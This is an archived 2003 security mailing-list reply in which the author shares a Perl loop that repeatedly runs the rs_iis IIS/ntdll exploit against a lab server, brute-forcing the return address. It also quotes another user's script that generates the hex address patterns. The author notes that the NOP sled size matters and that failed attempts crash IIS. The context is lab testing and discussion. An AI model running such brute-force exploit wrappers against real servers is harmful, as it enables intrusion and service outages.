-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm no perl expert, but this is what I whipped up for a similar test: $myserver = "pvdnet05"; for ($i = 0; $i < 256; $i++) { $retcode = sprintf("%x", $i); $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04"; system($exec); sleep(1); } Note that the last byte of the RET address is not terribly significant, since the NOP sled is ~65K in size and this value is only max 256 bytes significant. This didn't work well for me, since IIS will sometimes crash without a valid RET address, requiring a server restart. I had meant to look for a way to restart Windows 2000 services from a Linux box with Samba or similar tool, but got bored with it and started trying to exploit something else. :) - -Joshua Wright Senior Network and Security Architect Johnson & Wales University Joshua.Wrightat_private http://home.jwu.edu/jwright/ pgpkey: http://home.jwu.edu/jwright/pgpkey.htm fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73 > In playing with rs_iis.c (ntdll exploit) in our lab, I've been > looking for ways to brute force the return address. > > I know there's been a shell script (rs_brute.sh) released that > already does this, but since I've been playing with PERL lately > (and > since this > shell script did not exist when I began playing with the exploit), > I thought I'd take a whack at producing the RET addresses > (0x0000-0xffff) > in a PERL script. I just wanted to get your input and see if there > is and easier way to do this (using PERL, of course). > Basically, the goal > is as follows: > > 1) generate Hex Numbers from 0x0000 to 0xffff in the following > pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff) > 2) pass the output to rs_iis via system() command? > > So far, I can generate the output and print it to stdout. Any tips > on getting the script to run rs_iis once with each address > produced by the > script? Also, is there a way to produce this output without > creating an > array like this? > > #!/usr/bin/perl -w > @HexD = > ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); > > for ($i = 0; $i <= 255; $i += 1) { > printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i); > printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i); > } -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ Il0dIPyWAX6swPIQfg/LvvQk =hz0W -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 10:06:33 PST